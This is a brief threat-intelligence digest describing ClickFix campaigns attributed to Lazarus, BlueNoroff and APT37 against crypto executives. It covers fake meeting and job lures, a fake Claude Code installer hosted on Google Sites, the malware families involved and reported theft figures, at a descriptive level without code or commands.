ClickFix/SmartApeSG/Lazarus/APT37 evolving
Key Questions
Which threat actors are behind the ClickFix campaigns targeting crypto executives?
North Korean groups including Lazarus, BlueNoroff, and APT37 are deploying ClickFix attacks with Remcos, MacSync, and LNK-ZIP Python backdoors. They use AI-themed lures on Zoom, Teams, and Meet along with fake job offers on LinkedIn and GitHub to deliver malware and conduct supply-chain and clipboard hijacks.
What new delivery method involves a fake Claude Code installer?
A fake Claude Code installer is being hosted on Google Sites and uses steganography with in-memory execution to deliver credential-stealing malware. This expands the lure diversity in ongoing campaigns adjacent to crypto wallet theft operations.
How significant is the rise in AI-themed social engineering attacks?
There has been a 1265% surge in AI-related lures, often combined with deepfakes, contributing to over $3B in thefts. Defenses such as PhishSigma++ with layered protections have demonstrated greater than 99% effectiveness against these evolving threats.
NK Lazarus/BlueNoroff/APT37 deploys ClickFix Remcos/MacSync/LNK-ZIP Python backdoor via AI Zoom/Teams/Meet and fake-job lures (LinkedIn/GitHub) tricking crypto execs. Adds trojanized apps, supply-chain, clipboard hijacks for creds/wallet exfil. 1265% AI surge, deepfakes; $3B+ thefts. PhishSigma++/layered >99% effective. New: Fake Claude Code installer via Google Sites (steganography, in-memory execution) expands lure diversity; crypto wallet theft adjacent.